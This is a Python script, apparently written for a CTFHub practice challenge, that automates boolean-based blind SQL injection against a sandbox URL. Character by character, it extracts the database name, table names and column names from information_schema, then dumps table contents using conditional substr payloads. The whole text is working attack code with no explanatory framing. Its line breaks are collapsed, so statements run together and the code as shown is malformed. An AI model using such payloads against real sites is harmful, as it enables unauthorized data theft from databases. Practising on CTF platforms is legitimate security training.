CTFHub布尔盲注脚本
import requests
import stringdef get_database(url, mark):database = ''for i in range(1, 9):for j in string.ascii_letters:target = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)r = requests.get(target)if mark in r.text:database += jprint(database)breakprint('Database:', database)return databasedef get_table(url, mark, database):tablesname = []for i in range(0, 2):name = ''for j in range(1, 6):for k in string.ascii_letters:target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\database + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)r = requests.get(target)if mark in r.text:name += kprint(name)breaktablesname.append(name)print('Tablesame:', tablesname)return input("Choose TableName:")def get_columns(url, mark, tablename, database):columns = []for i in range(0, 3):name = ''for j in range(1, 6):for k in string.ascii_letters:target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\+ tablename + '" and table_schema="' + database\+ '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)r = requests.get(target)if mark in r.text:name += kprint(name)breakcolumns.append(name)print('Columnsname:', columns)return input("Choose Columnname:")def getdata(url,mark,tablename,database,columns):data = ''for i in range(0, 50):for j in string.digits\+ string.ascii_letters\+ string.punctuation:payload = url + 'if(substr((select '\+columns\+ ' from ' + tablename\+ '),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)request = requests.get(payload)if mark in request.text:data += jprint(data)breakprint(data)if __name__ == "__main__":url = "http://challenge-1d65b510fd09970c.sandbox.ctfhub.com:10080/?id="mark = "query_success"database = get_database(url, mark)tablename = get_table(url, mark, database)columns=get_columns(url, mark, tablename, database)getdata(url, mark, tablename, database,columns)